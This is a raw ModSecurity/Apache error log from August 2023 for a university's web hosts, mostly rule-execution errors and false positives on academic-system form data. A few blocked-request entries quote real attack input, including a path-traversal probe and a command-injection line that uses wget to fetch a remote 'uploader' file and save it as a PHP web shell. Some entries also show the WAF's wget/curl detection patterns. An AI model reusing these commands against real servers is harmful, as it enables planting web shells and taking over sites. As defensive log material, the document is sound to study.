[Tue Aug 29 09:26:59.358901 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/dashboard.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xUAAAAU"]
[Tue Aug 29 09:26:59.359017 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/dashboard.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xUAAAAU"]
[Tue Aug 29 09:26:59.364083 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/thickbox/thickbox.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjcAAAAV"]
[Tue Aug 29 09:26:59.366816 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-sanitize.min.js"] [unique_id "ZO1Xc8Co-f0AAPgTye4AAAAQ"]
[Tue Aug 29 09:26:59.367059 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/plugin-install.min.js"] [unique_id "ZO1Xc8Co-f0AAPgK@IIAAAAI"]
[Tue Aug 29 09:26:59.367116 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/plugin-install.min.js"] [unique_id "ZO1Xc8Co-f0AAPgK@IIAAAAI"]
[Tue Aug 29 09:26:59.379803 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/updates.min.js"] [unique_id "ZO1Xc8Co-f0AAPgD0ccAAAAO"]
[Tue Aug 29 09:26:59.379871 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/updates.min.js"] [unique_id "ZO1Xc8Co-f0AAPgD0ccAAAAO"]
[Tue Aug 29 09:26:59.382428 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/media-upload.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xYAAAAU"]
[Tue Aug 29 09:26:59.382495 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/media-upload.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xYAAAAU"]
[Tue Aug 29 09:26:59.387361 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/ui/accordion.min.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjgAAAAV"]
[Tue Aug 29 09:26:59.393643 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wplink.min.js"] [unique_id "ZO1Xc8Co-f0AAPgK@IMAAAAI"]
[Tue Aug 29 09:26:59.397016 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/ui/menu.min.js"] [unique_id "ZO1Xc8Co-f0AAPgTye8AAAAQ"]
[Tue Aug 29 09:26:59.402315 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/ui/autocomplete.min.js"] [unique_id "ZO1Xc8Co-f0AAPgD0cgAAAAO"]
[Tue Aug 29 09:26:59.723340 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/thickbox/loadingAnimation.gif"] [unique_id "ZO1Xc8Co-f0AAPgTyfAAAAAQ"]
[Tue Aug 29 09:26:59.723437 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xc8Co-f0AAPgD0ckAAAAO"]
[Tue Aug 29 09:26:59.723495 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xc8Co-f0AAPgD0ckAAAAO"]
[Tue Aug 29 09:26:59.746864 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xc8Co-f0AAPgTyfEAAAAQ"]
[Tue Aug 29 09:26:59.746923 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xc8Co-f0AAPgTyfEAAAAQ"]
[Tue Aug 29 09:27:59.755338 2023] [:error] [pid 63494] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xr8Co-f0AAPgGYj0AAAAC"]
[Tue Aug 29 09:27:59.755474 2023] [:error] [pid 63494] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xr8Co-f0AAPgGYj0AAAAC"]
[Tue Aug 29 09:29:33.545515 2023] [:error] [pid 63593] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mt/mt-xmlrpc.cgi"] [unique_id "ZO1YDcCo-f0AAPhpKQgAAAAP"]
[Tue Aug 29 09:29:41.053723 2023] [:error] [pid 63523] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mt/mt-xmlrpc.cgi"] [unique_id "ZO1YFcCo-f0AAPgjvvYAAAAc"]
[Tue Aug 29 09:29:44.381270 2023] [:error] [pid 63494] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mt-xmlrpc.cgi"] [unique_id "ZO1YGMCo-f0AAPgGYlMAAAAC"]
[Tue Aug 29 09:29:46.326265 2023] [:error] [pid 63598] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mt-xmlrpc.cgi"] [unique_id "ZO1YGsCo-f0AAPhuAi4AAAAD"]
[Tue Aug 29 09:29:48.556947 2023] [:error] [pid 63492] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/MT/mt-xmlrpc.cgi"] [unique_id "ZO1YHMCo-f0AAPgEgyYAAAAZ"]
[Tue Aug 29 09:29:50.933456 2023] [:error] [pid 63493] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/MT/mt-xmlrpc.cgi"] [unique_id "ZO1YHsCo-f0AAPgFsmgAAAAA"]
[Tue Aug 29 09:29:52.969189 2023] [:error] [pid 63494] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mtos/mt-xmlrpc.cgi"] [unique_id "ZO1YIMCo-f0AAPgGYlQAAAAC"]
[Tue Aug 29 09:29:54.916192 2023] [:error] [pid 63493] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cms/mt-xmlrpc.cgi"] [unique_id "ZO1YIsCo-f0AAPgFsmkAAAAA"]
[Tue Aug 29 09:29:59.765006 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1YJ8Co-f0AAPgEgycAAAAZ"]
[Tue Aug 29 09:29:59.765146 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1YJ8Co-f0AAPgEgycAAAAZ"]
[Tue Aug 29 09:30:23.112083 2023] [:error] [pid 63522] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/blog/mt-xmlrpc.cgi"] [unique_id "ZO1YP8Co-f0AAPgiZkIAAAAb"]
[Tue Aug 29 09:30:56.284275 2023] [:error] [pid 63522] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi/mt-xmlrpc.cgi"] [unique_id "ZO1YYMCo-f0AAPgiZkMAAAAb"]
[Tue Aug 29 09:30:59.760953 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1YY8Co-f0AAPgEgykAAAAZ"]
[Tue Aug 29 09:30:59.761104 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1YY8Co-f0AAPgEgykAAAAZ"]
[Tue Aug 29 09:32:59.772070 2023] [:error] [pid 63589] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Y28Co-f0AAPhlEmMAAAAE"]
[Tue Aug 29 09:32:59.772157 2023] [:error] [pid 63589] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Y28Co-f0AAPhlEmMAAAAE"]
[Tue Aug 29 09:34:59.784639 2023] [:error] [pid 63534] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1ZU8Co-f0AAPgu7lMAAAAB"]
[Tue Aug 29 09:34:59.784721 2023] [:error] [pid 63534] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1ZU8Co-f0AAPgu7lMAAAAB"]
[Tue Aug 29 09:35:48.053247 2023] [:error] [pid 63613] [client 68.219.104.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:filepath: ../../../x.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "ZO1ZhMCo-f0AAPh9tYQAAAAQ"]
[Tue Aug 29 09:35:51.554959 2023] [:error] [pid 63590] [client 68.219.104.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/raw.githubusercontent.com/tanjim530/Private_exploit/main/uploader.txt -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/x.php"] [unique_id "ZO1Zh8Co-f0AAPhmxnwAAAAG"]
[Tue Aug 29 09:36:34.919169 2023] [:error] [pid 63692] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_ambil. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_ambil: 20222x55201x41155050160181x15500211012x-x553109x0x-xx-x;20222x55201x41155050160181x505212012x-x553109x0x-xx-x;20222x55201x41155050160181x505231423x-x553109x0x-xx-x;20222x55201x41155050160181x505231431x-x553109x0x-xx-x;20222x55201x41155050160181x505232083x-x553109x0x-xx-x;20222x55201x41155050160181xTIF21032x-x553109x0x-xx-x;20222x55201x41155050160181xTIF21082x-x553109x0x-xx-x;20222x55201x41155050160181xTIF2112x-x553109x0x-xx-x;20222x55201x41155050160181xTIF2204..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_C [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpanambilsks"] [unique_id "ZO1ZssCo-f0AAPjMtc4AAAAn"]
[Tue Aug 29 09:36:49.097321 2023] [:error] [pid 63692] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_ambil. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_ambil: 20222x55201x41155050160181x15500211012x-x553109x0x-xx-x;20222x55201x41155050160181x505212012x-x553109x0x-xx-x;20222x55201x41155050160181x505231423x-x553109x0x-xx-x;20222x55201x41155050160181x505231431x-x553109x0x-xx-x;20222x55201x41155050160181x505232083x-x553109x0x-xx-x;20222x55201x41155050160181xTIF21032x-x553109x0x-xx-x;20222x55201x41155050160181xTIF21082x-x553109x0x-xx-x;20222x55201x41155050160181xTIF2112x-x553109x0x-xx-x;20222x55201x41155050160181xTIF2204..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_C [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpanambilsks"] [unique_id "ZO1ZwcCo-f0AAPjMtc8AAAAn"]
[Tue Aug 29 09:36:58.161349 2023] [:error] [pid 63681] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:tglkuitansi. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS:tglkuitansi: 2023-08-29T00:00:00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/save"] [unique_id "ZO1ZysCo-f0AAPjBYk8AAAAG"]
[Tue Aug 29 09:36:59.863088 2023] [:error] [pid 63693] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Zy8Co-f0AAPjNTPMAAAAo"]
[Tue Aug 29 09:36:59.863237 2023] [:error] [pid 63693] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Zy8Co-f0AAPjNTPMAAAAo"]
[Tue Aug 29 09:37:14.301816 2023] [:error] [pid 63696] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_setuju. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_setuju: 20222x55201x-x41155050160181x15500211012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505212012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231423x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231431x-x553109x0x0x-xx;20222x55201x-x41155050160181x505232083x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21032x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21082x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF2112x-x553109x0x0x-xx;20222x55201x-x411..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_ [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1Z2sCo-f0AAPjQkF8AAAAA"]
[Tue Aug 29 09:37:44.098211 2023] [:error] [pid 63683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_setuju. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_setuju: 20222x55201x-x41155050160181x15500211012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505212012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231423x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231431x-x553109x0x0x-xx;20222x55201x-x41155050160181x505232083x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21032x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21082x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF2112x-x553109x0x0x-xx;20222x55201x-x411..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_ [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1Z@MCo-f0AAPjDJ5cAAAAe"]
[Tue Aug 29 09:37:59.884198 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1aB8Co-f0AAPgD0dUAAAAO"]
[Tue Aug 29 09:37:59.884281 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1aB8Co-f0AAPgD0dUAAAAO"]
[Tue Aug 29 09:38:15.639180 2023] [:error] [pid 63682] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aF8Co-f0AAPjC@jEAAAAd"]
